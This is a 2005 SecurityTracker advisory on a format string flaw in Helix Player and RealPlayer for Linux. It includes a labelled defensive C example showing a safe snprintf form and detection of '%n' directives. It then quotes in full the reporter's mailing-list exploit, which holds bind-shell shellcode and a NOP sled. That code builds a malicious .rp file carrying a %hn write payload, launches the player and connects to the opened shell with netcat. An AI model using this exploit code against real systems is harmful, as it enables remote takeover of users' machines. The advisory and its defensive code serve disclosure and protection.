Helix Player Format String Bug Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID: 1014975
SecurityTracker URL: http://securitytracker.com/id?1014975
CVE Reference: CAN-2005-2710
Updated: Sep 27 2005
Original Entry Date: Sep 27 2005
Impact: Execution of arbitrary code via network, User access via network
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
Description: A vulnerability was reported in Helix Player. A remote user can cause arbitrary code to be executed on the target user's system.
A remote user can create a specially crafted '.rp' file that, when loaded by the target user, will trigger a format string flaw and
execute arbitrary code on the target user's system. The code will run with the privileges of the target user.
RealPlayer for Linux/UNIX is also affected.
c0ntex reported this vulnerability.
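The bug class behind this advisory is a printf-family call whose format argument is taken from the '.rp' file rather than from the program. The following C program is an added illustration, not code from the advisory, from the reporter, or from the Helix project: it shows the hardened call shape (untrusted text passed through a fixed "%s" format), plus two parse-time checks a defender can apply to attribute values, one counting '%' directives and one flagging the '%n' write conversion that turns a format-string leak into a memory write. All function names and the sample attribute values are constructed for this example.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

/* Constructed sample attribute values (not the advisory's payload): the shape of
 * text an attacker controls when a file parser hands it to a printf-family
 * function as the format argument. */
static const char SAMPLE_BAD[]  = "findme%x%x%n";
static const char SAMPLE_POS[]  = "clip%7$n";
static const char SAMPLE_GOOD[] = "100%% safe";

/* Vulnerable pattern, kept as a comment only:
 *     snprintf(out, outsz, handle);
 * With handle under attacker control, %x reads stack words and %n writes to an
 * attacker-chosen location. */

/* Hardened form: the untrusted value is passed as a %s argument, so any '%'
 * inside it is copied literally instead of being interpreted. Returns the
 * length snprintf reports. */
int format_handle_safe(char *out, size_t outsz, const char *handle)
{
    return snprintf(out, outsz, "image handle: %s", handle);
}

/* Helper: render via the safe path and compare against the expected text. */
int safe_render_equals(const char *handle, const char *expected)
{
    char out[256];
    format_handle_safe(out, sizeof out, handle);
    return strcmp(out, expected) == 0;
}

/* Parse-time check: count '%' directives in an attribute value. "%%" is a
 * literal percent and is not counted. A non-zero result in a field that should
 * be a plain identifier is worth rejecting or logging. */
int count_format_directives(const char *s)
{
    int n = 0;
    for (size_t i = 0; s[i] != '\0'; i++) {
        if (s[i] != '%')
            continue;
        if (s[i + 1] == '%') {  /* literal "%%": skip both characters */
            i++;
            continue;
        }
        n++;
    }
    return n;
}

/* Detection: does the value contain a %n conversion, including forms with
 * flags, width, precision, a positional "$" index or a length modifier
 * (e.g. "%7$n", "%.100u%3$hn")? */
bool has_write_directive(const char *s)
{
    for (size_t i = 0; s[i] != '\0'; i++) {
        if (s[i] != '%')
            continue;
        if (s[i + 1] == '%') {  /* literal percent */
            i++;
            continue;
        }
        size_t j = i + 1;
        /* skip flags, width, precision, positional index and length modifiers */
        while (s[j] != '\0' && strchr("0123456789.-+ #*$hlLqjzt", s[j]) != NULL)
            j++;
        if (s[j] == 'n')
            return true;
    }
    return false;
}

int main(void)
{
    char out[256];
    format_handle_safe(out, sizeof out, SAMPLE_BAD);
    printf("safe rendering : %s\n", out);
    printf("directives     : %d\n", count_format_directives(SAMPLE_BAD));
    printf("has %%n         : %s\n", has_write_directive(SAMPLE_BAD) ? "yes" : "no");
    printf("positional %%n  : %s\n", has_write_directive(SAMPLE_POS) ? "yes" : "no");
    printf("literal %%%%     : %d directives\n", count_format_directives(SAMPLE_GOOD));
    return 0;
}
```

The input checks are a second line of defence; the primary fix is the call shape. Building with gcc or clang using -Wformat -Wformat-security (or -Werror=format-security) flags every printf-family call whose format string is not a literal, which is the quickest way to find this pattern across a code base such as a media-file parser.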
Impact: A remote user can cause arbitrary code to be executed on the target user's system with the privileges of the target user.
Solution: The vendor plans to issue a fixed version (1.0.6). [Editor's note: A source code fix is available via CVS.]
Red Hat has issued a fix for Red Hat Enterprise Linux 4:
https://rhn.redhat.com/errata/RHSA-2005-788.html
Vendor URL: www.helixcommunity.org/
Cause: Input validation error, State error
Underlying OS: Linux (Any)
Reported By: c0ntex <c0ntexb@gmail.com>
Message History:
This archive entry has one or more follow-up message(s) listed below.
Source Message Contents
Date: Mon, 26 Sep 2005 19:27:32 +0100
From: c0ntex <c0ntexb@gmail.com>
Subject: [Full-disclosure] RealPlayer && HelixPlayer Remote Format String
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFFER 10000
#define EBPMSB 64105
#define HOST "localhost"
#define NETCAT "/bin/nc"
#define NOPS 0x90
#define STACKPOP 148
#define VULN "/usr/local/RealPlayer/realplay"

/* output file name: arbitrary bytes ending in ".rp" */
char filename[]="\x56\x59\x14\x82\x26\x08\x2e\x72\x70";

/* metasploit port binding shellcode = 4444 */
char hellcode[]="\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66"
"\x58\x99\x89\xe1\xcd\x80\x96\x43\x52"
"\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a"
"\x66\x58\x50\x51\x56\x89\xe1\xcd\x80"
"\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56"
"\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a"
"\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9"
"\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68"
"\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89"
"\xe1\xcd\x80";

/* write the crafted .rp file; the image "handle" attribute carries the
 * format string, the "name" attribute carries the NOP sled and shellcode */
int
filegen(char *shellcode)
{
    FILE *rp;

    printf("[-] Creating file [%s]\n", filename);
    rp = fopen(filename, "w");
    if(!rp) {
        puts("[!] Could not fopen file!");
        free(shellcode);
        return(EXIT_FAILURE);
    }
    printf("[-] Using [%d] stack pops\n[-] Modifying EBP MSB with value [%d]\n", STACKPOP, EBPMSB);
    fprintf(rp,
        "<imfl>\n"
        "<head\n"
        "duration=\"1:33.7\"\n"
        "timeformat=\"dd:hh:mm:ss.xyz\"\n"
        "preroll=\"1:33.7\"\n"
        "bitrate=\"1337\"\n"
        "width=\"69\"\n"
        "height=\"69\"\n"
        "aspect=\"\"\n"
        "url=\"http://www.open-security.org\"/>\n"
        "<image handle=\"%%.%du%%%d$hn\" name=\"findme%s\"/> \n"
        "<fadein start=\"0\" duration=\"0:01\" target=\" 2\"/>\n"
        "</imfl>", EBPMSB, STACKPOP, shellcode);
    fclose(rp);
    free(shellcode); shellcode = NULL;
    return(EXIT_SUCCESS);
}

int
main(int argc, char **argv)
{
    char *shellcode = NULL;

    puts("\nRemote format string exploit POC for UNIX RealPlayer && HelixPlayer");
    puts("Code tested on Debian 3.1 against RealPlayer 10 Gold's latest version");
    puts("by c0ntex || c0ntexb@gmail.com || http://www.open-security.org\n");

    shellcode = (char *)malloc(BUFFER);
    if(!shellcode) {
        puts("[!] Could not malloc");
        return(EXIT_FAILURE);
    }
    /* fill the buffer with NOPs and place the shellcode at its end */
    memset(shellcode, NOPS, BUFFER);
    memcpy(&shellcode[BUFFER-strlen(hellcode)], hellcode, strlen(hellcode));
    shellcode[BUFFER] = '\0';   /* note: index BUFFER is one past the BUFFER-byte allocation */

    if(filegen(shellcode) != EXIT_SUCCESS)
        return(EXIT_FAILURE);
    puts("[-] Completed creation of test file!\n[-] Executing RealPlayer now...");

    /* child: launch the player on the crafted file; parent: wait, then connect */
    switch(fork()) {
        case -1:
            puts("[!] Could not fork off, bailing!");
            return(EXIT_FAILURE);
        case 0:
            if(execl(VULN, "realplay", filename, NULL) <0) {
                puts("[!] Could not execute realplayer... :(");
                return(EXIT_FAILURE);
            }
    }
    puts("[-] Connecting to shell in 10 seconds\n** YOU MIGHT HAVE TO HIT RETURN ON REALPLAYER WINDOW **");
    sleep(10);
    if(execl(NETCAT, "nc", HOST, "4444", NULL) <0) {
        puts("[!] Could not connect, check the core file!");
        return(EXIT_FAILURE);
    }
    return(EXIT_SUCCESS);
}
--
regards
c0ntex
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/